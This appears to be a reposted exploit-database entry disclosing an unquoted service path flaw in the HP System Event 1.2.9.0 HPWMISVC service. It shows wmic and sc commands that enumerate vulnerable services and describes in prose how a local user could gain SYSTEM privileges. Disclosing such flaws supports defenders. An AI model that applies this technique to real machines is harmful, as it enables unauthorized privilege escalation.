Hp system event 1.2.9.0 hpwmisvc unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-02-17 | Type : local | Platform : windows
This exploit / vulnerability Hp system event 1.2.9.0 hpwmisvc unquoted service path is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-14
# Vendor Homepage:https://www8.hp.com/mx/es/home.html
# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe
# HP Development Company, L.P.
# Tested Version: 1.2.9.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """
HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto

C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\>
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be
# executed during application startup or reboot. If successful, the local user's code would
# execute with the elevated privileges of the application.